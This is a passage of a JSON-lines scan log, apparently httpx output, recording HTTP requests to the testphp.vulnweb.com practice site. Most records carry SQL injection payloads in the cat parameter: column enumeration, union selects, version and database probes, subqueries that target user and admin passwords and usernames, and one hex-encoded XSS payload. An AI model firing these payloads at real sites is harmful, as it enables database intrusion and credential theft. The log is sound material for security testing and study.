22::::%22,email),8,9,10,11%20from%20users\",\"time\":\"350.028623ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":658,\"lines\":108,\"status_code\":200,\"content_length\":8380,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:28.723142355Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%60\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%60\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%60\",\"time\":\"343.893363ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4976,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:28.828342872Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%D8%B7%D8%A8%D8%A7%D8%B1%D9%84%D8%A7%D8%A8\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%D8%B7%D8%A8%D8%A7%D8%B1%D9%84%D8%A7%D8%A8\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%D8%B7%D8%A8%D8%A7%D8%B1%D9%84%D8%A7%D8%A8\",\"time\":\"345.976195ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4879,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:28.918339784Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%E2%80%A2%D8%B9%D9%90%D9%82%D9%88%D9%85%D9%84%D8%A7%7Ctestphp.vulnweb.com%E2%80%A2%D8%B1%D9%8A%D8%BA%D8%AA%D9%8C%D9%85%D9%84%D8%A7\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%E2%80%A2%D8%B9%D9%90%D9%82%D9%88%D9%85%D9%84%D8%A7%7Ctestphp.vulnweb.com%E2%80%A2%D8%B1%D9%8A%D8%BA%D8%AA%D9%8C%D9%85%D9%84%D8%A7\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%E2%80%A2%D8%B9%D9%90%D9%82%D9%88%D9%85%D9%84%D8%A7%7Ctestphp.vulnweb.com%E2%80%A2%D8%B1%D9%8A%D8%BA%D8%AA%D9%8C%D9%85%D9%84%D8%A7\",\"time\":\"357.831437ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4882,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:28.977818964Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%EF%80%A0\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%EF%80%A0\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%EF%80%A0\",\"time\":\"353.799482ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4868,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:29.34251285Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%EF%80%A0%EF%82%B7\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1%EF%80%A0%EF%82%B7\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1%EF%80%A0%EF%82%B7\",\"time\":\"349.093804ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4871,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:29.70342844Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1''\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1''\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1''\",\"time\":\"353.187891ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4977,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:29.806978164Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+PROCEDURE\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+PROCEDURE\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+PROCEDURE\",\"time\":\"350.497063ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4984,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:29.986354879Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+Union+Select+@k:=0x3c2f5469746c652f3c2f5363726970742f27223e3c5376672f4f6e4c6f61643d616c6572742831293e,@k,@k,@k,@k,@k,@k,@k,@k,@k,@k%23\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+Union+Select+@k:=0x3c2f5469746c652f3c2f5363726970742f27223e3c5376672f4f6e4c6f61643d616c6572742831293e,@k,@k,@k,@k,@k,@k,@k,@k,@k,@k%23\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+Union+Select+@k:=0x3c2f5469746c652f3c2f5363726970742f27223e3c5376672f4f6e4c6f61643d616c6572742831293e,@k,@k,@k,@k,@k,@k,@k,@k,@k,@k%23\",\"time\":\"349.294451ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":658,\"lines\":108,\"status_code\":200,\"content_length\":8618,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:30.460968232Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(SELECT+1+from+admin+limit+0,1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(SELECT+1+from+admin+limit+0,1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+(SELECT+1+from+admin+limit+0,1\",\"time\":\"358.42081ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:30.611161199Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(SELECT+1+from+user+limit+0,1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(SELECT+1+from+user+limit+0,1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+(SELECT+1+from+user+limit+0,1\",\"time\":\"340.828914ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:32.260730581Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(SELECT+1+from+users+limit+0,1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(SELECT+1+from+users+limit+0,1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+(SELECT+1+from+users+limit+0,1\",\"time\":\"354.330768ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:33.336746699Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(select+pass+from+users+limit+0,1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(select+pass+from+users+limit+0,1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+(select+pass+from+users+limit+0,1\",\"time\":\"353.946951ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:33.60423611Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(select+password+from+users+limit+0,1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(select+password+from+users+limit+0,1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+(select+password+from+users+limit+0,1\",\"time\":\"357.053283ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:33.923656274Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(select+uname+from+users+limit+0,1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(select+uname+from+users+limit+0,1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+(select+uname+from+users+limit+0,1\",\"time\":\"343.541708ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:34.694324929Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(select+username+from+users+limit+0,1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+(select+username+from+users+limit+0,1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+(select+username+from+users+limit+0,1\",\"time\":\"348.73587ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:34.786312592Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+SELECT+1+from+admins+limit+0,1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+SELECT+1+from+admins+limit+0,1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+SELECT+1+from+admins+limit+0,1\",\"time\":\"344.214652ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":525,\"lines\":105,\"status_code\":200,\"content_length\":5005,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:34.799940468Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+ascii(substring((select\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+and+ascii(substring((select\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+and+ascii(substring((select\",\"time\":\"359.266566ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:34.844453649Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+order+by+1\",\"time\":\"357.750263ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":640,\"lines\":108,\"status_code\":200,\"content_length\":7880,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:34.859425422Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+order+by+12\",\"time\":\"356.4263ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4866,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.223369028Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+2\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+2\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+order+by+2\",\"time\":\"353.576393ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":640,\"lines\":108,\"status_code\":200,\"content_length\":7880,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.238877796Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11\",\"time\":\"344.12362ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":658,\"lines\":108,\"status_code\":200,\"content_length\":8299,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.311917476Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--\",\"time\":\"343.253486ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":658,\"lines\":108,\"status_code\":200,\"content_length\":8299,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.326858603Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+%27vuln1%27,@@version,%27vuln3%27,%27vuln4%27,%27vuln5%27,%27vuln6%27,%27vuln7%27,%27vuln8%27,%27vuln9%27,%27vuln10%27,%27vuln11%27\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+%27vuln1%27,@@version,%27vuln3%27,%27vuln4%27,%27vuln5%27,%27vuln6%27,%27vuln7%27,%27vuln8%27,%27vuln9%27,%27vuln10%27,%27vuln11%27\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+union+select+%27vuln1%27,@@version,%27vuln3%27,%27vuln4%27,%27vuln5%27,%27vuln6%27,%27vuln7%27,%27vuln8%27,%27vuln9%27,%27vuln10%27,%27vuln11%27\",\"time\":\"353.202695ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":658,\"lines\":108,\"status_code\":200,\"content_length\":8349,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.416481568Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+%27vuln1%27,database(),%27vul\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+%27vuln1%27,database(),%27vul\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+union+select+%27vuln1%27,database(),%27vul\",\"time\":\"355.575218ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4979,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.493096718Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11\",\"time\":\"349.116684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":658,\"lines\":108,\"status_code\":200,\"content_length\":8299,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.508510536Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1-\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1-\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1-\",\"time\":\"344.961094ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.642100525Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1--dbs\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1--dbs\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1--dbs\",\"time\":\"350.876343ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":497,\"lines\":105,\"status_code\":200,\"content_length\":4867,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.667143732Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/\",\"time\":\"354.132329ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.723665763Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/nginx/1.4.1\",\"time\":\"354.308489ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4977,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:35.831083272Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/nginx/1.4.1176.28.50.165\",\"time\":\"353.085932ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4990,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:39.090063302Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped\",\"time\":\"352.857176ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":4997,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:39.201656183Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR-\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR-\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR-\",\"time\":\"359.446018ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":520,\"lines\":105,\"status_code\":200,\"content_length\":5001,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:25:39.277459397Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-\",\"input\":\"http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-\",\"title\":\"pictures\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/listpr